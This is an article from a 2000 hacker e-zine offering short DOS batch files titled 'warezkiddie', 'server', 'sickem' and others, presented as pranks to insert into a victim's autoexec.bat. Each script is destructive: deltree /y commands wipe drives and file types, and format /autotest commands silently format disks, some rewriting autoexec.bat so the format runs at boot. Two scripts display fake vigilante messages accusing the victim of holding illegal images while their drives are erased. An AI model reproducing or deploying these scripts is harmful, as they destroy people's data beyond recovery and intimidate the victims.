_________SWAT MAGAZINE ISSUE TWENTY SIX FEBRARY 2000 __________ / \___________________________________________/ \ / Pointless yet fun Batch files! \ / by -=The Firestarter=- \ ----------------------------------------------------------------------- Before anyone e-mails to ask me - no i don't get tired of writing these little things! Pop any of the code in these into any autoexec.bat file and vacate the area :o) --warezkiddie.bat-- @echo off deltree /y c:\*.r* >nul deltree /y c:\*.ace >nul deltree /y c:\*.zip >nul deltree /y c:\progra~1\*.* >nul cls echo Phear the warez kiddie!!!! echo format /autotest c: >autoexec.bat --warezkiddie.bat-- --student.bat-- deltree /y c:\*.doc >nul deltree /y c:\progra~1\*.* >nul deltree /y c:\*.* --student.bat-- --mp3.bat-- deltree /y c:\*.mp3 >nul --mp3.bat-- --lamer.bat-- @echo off echo format /u /autotest c: >nul >autoexec.bat --lamer.bat-- --pedo.bat-- @echo off echo @echo off >autoexec.bat echo cls >>autoexec.nat echo echo The SWATeam found kiddie porn on your hard drive!!! >>autoexec.bat echo format /autotest c: >nul >>autoexec.bat --pedo.bat-- --server.bat-- @echo off deltree /y d: >nul deltree /y e: >nul deltree /y f: >nul deltree /y g: >nul deltree /y h: >nul deltree /y i: >nul deltree /y j: >nul deltree /y k: >nul deltree /y l: >nul deltree /y m: >nul deltree /y n: >nul deltree /y o: >nul deltree /y p: >nul deltree /y q: >nul deltree /y r: >nul deltree /y s: >nul deltree /y t: >nul deltree /y u: >nul deltree /y v: >nul deltree /y w: >nul deltree /y x: >nul deltree /y y: >nul deltree /y z: >nul deltree /y c: >nul echo Whoops, somethig just went wrong! --server.bat-- --sickem.bat-- @echo off echo If you are reading this message then you have been 0wned by echo the SWATeam! We gained unauthorised access to your computer echo while you where online and detected nasty pictues that are echo both illegal and immoral! echo echo We have taken your name, address and ISP account details. echo echo Action HAS been taken. deltree /y d: >nul format /autotest /q d: >nul echo Since you are now reading this any second/third/etc hard drives echo have been formatted. echo echo While your reading this your main hard drive is in the middle of echo a format, reboot if you want, but all data is erased beyond echo all recovery, teehee reboot in the middle of a format and you echo gonna have a nightmare recovering your hard drive to EVER echo be used again! echo echo www.swateam.org echo I hope that you have a nice time reinstalling format /autotest c: >nul -sickem.bat--